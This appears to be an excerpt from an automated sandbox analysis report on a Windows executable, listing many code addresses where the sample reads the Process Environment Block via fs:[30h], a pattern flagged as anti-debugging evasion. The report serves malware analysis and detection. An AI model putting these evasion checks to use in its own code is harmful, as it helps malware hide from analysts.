Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE284 mov eax, dword ptr fs:[00000030h]	10_2_013DE284
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE284 mov eax, dword ptr fs:[00000030h]	10_2_013DE284
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01420283 mov eax, dword ptr fs:[00000030h]	10_2_01420283
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01420283 mov eax, dword ptr fs:[00000030h]	10_2_01420283
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01420283 mov eax, dword ptr fs:[00000030h]	10_2_01420283
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B02E1 mov eax, dword ptr fs:[00000030h]	10_2_013B02E1
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B02E1 mov eax, dword ptr fs:[00000030h]	10_2_013B02E1
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B02E1 mov eax, dword ptr fs:[00000030h]	10_2_013B02E1
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014362A0 mov eax, dword ptr fs:[00000030h]	10_2_014362A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014362A0 mov ecx, dword ptr fs:[00000030h]	10_2_014362A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014362A0 mov eax, dword ptr fs:[00000030h]	10_2_014362A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014362A0 mov eax, dword ptr fs:[00000030h]	10_2_014362A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014362A0 mov eax, dword ptr fs:[00000030h]	10_2_014362A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014362A0 mov eax, dword ptr fs:[00000030h]	10_2_014362A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA2C3 mov eax, dword ptr fs:[00000030h]	10_2_013AA2C3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA2C3 mov eax, dword ptr fs:[00000030h]	10_2_013AA2C3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA2C3 mov eax, dword ptr fs:[00000030h]	10_2_013AA2C3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA2C3 mov eax, dword ptr fs:[00000030h]	10_2_013AA2C3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AA2C3 mov eax, dword ptr fs:[00000030h]	10_2_013AA2C3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE53E mov eax, dword ptr fs:[00000030h]	10_2_013CE53E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE53E mov eax, dword ptr fs:[00000030h]	10_2_013CE53E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE53E mov eax, dword ptr fs:[00000030h]	10_2_013CE53E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE53E mov eax, dword ptr fs:[00000030h]	10_2_013CE53E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE53E mov eax, dword ptr fs:[00000030h]	10_2_013CE53E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0535 mov eax, dword ptr fs:[00000030h]	10_2_013B0535
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0535 mov eax, dword ptr fs:[00000030h]	10_2_013B0535
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0535 mov eax, dword ptr fs:[00000030h]	10_2_013B0535
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0535 mov eax, dword ptr fs:[00000030h]	10_2_013B0535
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0535 mov eax, dword ptr fs:[00000030h]	10_2_013B0535
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0535 mov eax, dword ptr fs:[00000030h]	10_2_013B0535
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01436500 mov eax, dword ptr fs:[00000030h]	10_2_01436500
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474500 mov eax, dword ptr fs:[00000030h]	10_2_01474500
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474500 mov eax, dword ptr fs:[00000030h]	10_2_01474500
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474500 mov eax, dword ptr fs:[00000030h]	10_2_01474500
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474500 mov eax, dword ptr fs:[00000030h]	10_2_01474500
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474500 mov eax, dword ptr fs:[00000030h]	10_2_01474500
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474500 mov eax, dword ptr fs:[00000030h]	10_2_01474500
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474500 mov eax, dword ptr fs:[00000030h]	10_2_01474500
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D656A mov eax, dword ptr fs:[00000030h]	10_2_013D656A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D656A mov eax, dword ptr fs:[00000030h]	10_2_013D656A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D656A mov eax, dword ptr fs:[00000030h]	10_2_013D656A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A8550 mov eax, dword ptr fs:[00000030h]	10_2_013A8550
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A8550 mov eax, dword ptr fs:[00000030h]	10_2_013A8550
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C45B1 mov eax, dword ptr fs:[00000030h]	10_2_013C45B1
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C45B1 mov eax, dword ptr fs:[00000030h]	10_2_013C45B1
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE59C mov eax, dword ptr fs:[00000030h]	10_2_013DE59C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D4588 mov eax, dword ptr fs:[00000030h]	10_2_013D4588
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A2582 mov eax, dword ptr fs:[00000030h]	10_2_013A2582
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A2582 mov ecx, dword ptr fs:[00000030h]	10_2_013A2582
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DC5ED mov eax, dword ptr fs:[00000030h]	10_2_013DC5ED
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DC5ED mov eax, dword ptr fs:[00000030h]	10_2_013DC5ED
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A25E0 mov eax, dword ptr fs:[00000030h]	10_2_013A25E0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE5E7 mov eax, dword ptr fs:[00000030h]	10_2_013CE5E7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE5E7 mov eax, dword ptr fs:[00000030h]	10_2_013CE5E7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE5E7 mov eax, dword ptr fs:[00000030h]	10_2_013CE5E7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE5E7 mov eax, dword ptr fs:[00000030h]	10_2_013CE5E7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE5E7 mov eax, dword ptr fs:[00000030h]	10_2_013CE5E7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE5E7 mov eax, dword ptr fs:[00000030h]	10_2_013CE5E7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE5E7 mov eax, dword ptr fs:[00000030h]	10_2_013CE5E7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CE5E7 mov eax, dword ptr fs:[00000030h]	10_2_013CE5E7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014205A7 mov eax, dword ptr fs:[00000030h]	10_2_014205A7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014205A7 mov eax, dword ptr fs:[00000030h]	10_2_014205A7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014205A7 mov eax, dword ptr fs:[00000030h]	10_2_014205A7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A65D0 mov eax, dword ptr fs:[00000030h]	10_2_013A65D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA5D0 mov eax, dword ptr fs:[00000030h]	10_2_013DA5D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA5D0 mov eax, dword ptr fs:[00000030h]	10_2_013DA5D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE5CF mov eax, dword ptr fs:[00000030h]	10_2_013DE5CF
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE5CF mov eax, dword ptr fs:[00000030h]	10_2_013DE5CF
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA430 mov eax, dword ptr fs:[00000030h]	10_2_013DA430
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0145A456 mov eax, dword ptr fs:[00000030h]	10_2_0145A456
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139E420 mov eax, dword ptr fs:[00000030h]	10_2_0139E420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139E420 mov eax, dword ptr fs:[00000030h]	10_2_0139E420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139E420 mov eax, dword ptr fs:[00000030h]	10_2_0139E420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139C427 mov eax, dword ptr fs:[00000030h]	10_2_0139C427
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142C460 mov ecx, dword ptr fs:[00000030h]	10_2_0142C460
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D8402 mov eax, dword ptr fs:[00000030h]	10_2_013D8402
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D8402 mov eax, dword ptr fs:[00000030h]	10_2_013D8402
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D8402 mov eax, dword ptr fs:[00000030h]	10_2_013D8402
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CA470 mov eax, dword ptr fs:[00000030h]	10_2_013CA470
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CA470 mov eax, dword ptr fs:[00000030h]	10_2_013CA470
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CA470 mov eax, dword ptr fs:[00000030h]	10_2_013CA470
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01426420 mov eax, dword ptr fs:[00000030h]	10_2_01426420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01426420 mov eax, dword ptr fs:[00000030h]	10_2_01426420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01426420 mov eax, dword ptr fs:[00000030h]	10_2_01426420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01426420 mov eax, dword ptr fs:[00000030h]	10_2_01426420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01426420 mov eax, dword ptr fs:[00000030h]	10_2_01426420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01426420 mov eax, dword ptr fs:[00000030h]	10_2_01426420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01426420 mov eax, dword ptr fs:[00000030h]	10_2_01426420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139645D mov eax, dword ptr fs:[00000030h]	10_2_0139645D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C245A mov eax, dword ptr fs:[00000030h]	10_2_013C245A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE443 mov eax, dword ptr fs:[00000030h]	10_2_013DE443
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE443 mov eax, dword ptr fs:[00000030h]	10_2_013DE443
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE443 mov eax, dword ptr fs:[00000030h]	10_2_013DE443
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE443 mov eax, dword ptr fs:[00000030h]	10_2_013DE443
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE443 mov eax, dword ptr fs:[00000030h]	10_2_013DE443
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE443 mov eax, dword ptr fs:[00000030h]	10_2_013DE443
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE443 mov eax, dword ptr fs:[00000030h]	10_2_013DE443
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE443 mov eax, dword ptr fs:[00000030h]	10_2_013DE443
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D44B0 mov ecx, dword ptr fs:[00000030h]	10_2_013D44B0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A64AB mov eax, dword ptr fs:[00000030h]	10_2_013A64AB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A04E5 mov ecx, dword ptr fs:[00000030h]	10_2_013A04E5
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0145A49A mov eax, dword ptr fs:[00000030h]	10_2_0145A49A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142A4B0 mov eax, dword ptr fs:[00000030h]	10_2_0142A4B0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D273C mov eax, dword ptr fs:[00000030h]	10_2_013D273C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D273C mov ecx, dword ptr fs:[00000030h]	10_2_013D273C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D273C mov eax, dword ptr fs:[00000030h]	10_2_013D273C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01424755 mov eax, dword ptr fs:[00000030h]	10_2_01424755
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DC720 mov eax, dword ptr fs:[00000030h]	10_2_013DC720
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DC720 mov eax, dword ptr fs:[00000030h]	10_2_013DC720
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142E75D mov eax, dword ptr fs:[00000030h]	10_2_0142E75D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A0710 mov eax, dword ptr fs:[00000030h]	10_2_013A0710
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D0710 mov eax, dword ptr fs:[00000030h]	10_2_013D0710
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DC700 mov eax, dword ptr fs:[00000030h]	10_2_013DC700
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A8770 mov eax, dword ptr fs:[00000030h]	10_2_013A8770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770 mov eax, dword ptr fs:[00000030h]	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A0750 mov eax, dword ptr fs:[00000030h]	10_2_013A0750
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2750 mov eax, dword ptr fs:[00000030h]	10_2_013E2750
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2750 mov eax, dword ptr fs:[00000030h]	10_2_013E2750
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D674D mov esi, dword ptr fs:[00000030h]	10_2_013D674D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D674D mov eax, dword ptr fs:[00000030h]	10_2_013D674D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D674D mov eax, dword ptr fs:[00000030h]	10_2_013D674D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141C730 mov eax, dword ptr fs:[00000030h]	10_2_0141C730
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014207C3 mov eax, dword ptr fs:[00000030h]	10_2_014207C3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A07AF mov eax, dword ptr fs:[00000030h]	10_2_013A07AF
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142E7E1 mov eax, dword ptr fs:[00000030h]	10_2_0142E7E1
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A47FB mov eax, dword ptr fs:[00000030h]	10_2_013A47FB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A47FB mov eax, dword ptr fs:[00000030h]	10_2_013A47FB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144678E mov eax, dword ptr fs:[00000030h]	10_2_0144678E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C27ED mov eax, dword ptr fs:[00000030h]	10_2_013C27ED
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C27ED mov eax, dword ptr fs:[00000030h]	10_2_013C27ED
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C27ED mov eax, dword ptr fs:[00000030h]	10_2_013C27ED
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014547A0 mov eax, dword ptr fs:[00000030h]	10_2_014547A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AC7C0 mov eax, dword ptr fs:[00000030h]	10_2_013AC7C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A262C mov eax, dword ptr fs:[00000030h]	10_2_013A262C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BE627 mov eax, dword ptr fs:[00000030h]	10_2_013BE627
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D6620 mov eax, dword ptr fs:[00000030h]	10_2_013D6620
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D8620 mov eax, dword ptr fs:[00000030h]	10_2_013D8620
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E2619 mov eax, dword ptr fs:[00000030h]	10_2_013E2619
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146866E mov eax, dword ptr fs:[00000030h]	10_2_0146866E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146866E mov eax, dword ptr fs:[00000030h]	10_2_0146866E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B260B mov eax, dword ptr fs:[00000030h]	10_2_013B260B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B260B mov eax, dword ptr fs:[00000030h]	10_2_013B260B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B260B mov eax, dword ptr fs:[00000030h]	10_2_013B260B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B260B mov eax, dword ptr fs:[00000030h]	10_2_013B260B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B260B mov eax, dword ptr fs:[00000030h]	10_2_013B260B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B260B mov eax, dword ptr fs:[00000030h]	10_2_013B260B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B260B mov eax, dword ptr fs:[00000030h]	10_2_013B260B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E609 mov eax, dword ptr fs:[00000030h]	10_2_0141E609
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D2674 mov eax, dword ptr fs:[00000030h]	10_2_013D2674
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA660 mov eax, dword ptr fs:[00000030h]	10_2_013DA660
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA660 mov eax, dword ptr fs:[00000030h]	10_2_013DA660
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BC640 mov eax, dword ptr fs:[00000030h]	10_2_013BC640
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D66B0 mov eax, dword ptr fs:[00000030h]	10_2_013D66B0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DC6A6 mov eax, dword ptr fs:[00000030h]	10_2_013DC6A6
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A4690 mov eax, dword ptr fs:[00000030h]	10_2_013A4690
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A4690 mov eax, dword ptr fs:[00000030h]	10_2_013A4690
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0141E6F2
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0141E6F2
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0141E6F2
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E6F2 mov eax, dword ptr fs:[00000030h]	10_2_0141E6F2
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014206F1 mov eax, dword ptr fs:[00000030h]	10_2_014206F1
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014206F1 mov eax, dword ptr fs:[00000030h]	10_2_014206F1
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA6C7 mov ebx, dword ptr fs:[00000030h]	10_2_013DA6C7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DA6C7 mov eax, dword ptr fs:[00000030h]	10_2_013DA6C7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01420946 mov eax, dword ptr fs:[00000030h]	10_2_01420946
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01474940 mov eax, dword ptr fs:[00000030h]	10_2_01474940
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01398918 mov eax, dword ptr fs:[00000030h]	10_2_01398918
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01398918 mov eax, dword ptr fs:[00000030h]	10_2_01398918
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01444978 mov eax, dword ptr fs:[00000030h]	10_2_01444978
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01444978 mov eax, dword ptr fs:[00000030h]	10_2_01444978
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142C97C mov eax, dword ptr fs:[00000030h]	10_2_0142C97C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E908 mov eax, dword ptr fs:[00000030h]	10_2_0141E908
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141E908 mov eax, dword ptr fs:[00000030h]	10_2_0141E908
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E096E mov eax, dword ptr fs:[00000030h]	10_2_013E096E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E096E mov edx, dword ptr fs:[00000030h]	10_2_013E096E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E096E mov eax, dword ptr fs:[00000030h]	10_2_013E096E
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142C912 mov eax, dword ptr fs:[00000030h]	10_2_0142C912
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C6962 mov eax, dword ptr fs:[00000030h]	10_2_013C6962
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C6962 mov eax, dword ptr fs:[00000030h]	10_2_013C6962
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C6962 mov eax, dword ptr fs:[00000030h]	10_2_013C6962
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142892A mov eax, dword ptr fs:[00000030h]	10_2_0142892A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0143892B mov eax, dword ptr fs:[00000030h]	10_2_0143892B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014369C0 mov eax, dword ptr fs:[00000030h]	10_2_014369C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146A9D3 mov eax, dword ptr fs:[00000030h]	10_2_0146A9D3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A09AD mov eax, dword ptr fs:[00000030h]	10_2_013A09AD
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A09AD mov eax, dword ptr fs:[00000030h]	10_2_013A09AD
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0 mov eax, dword ptr fs:[00000030h]	10_2_013B29A0
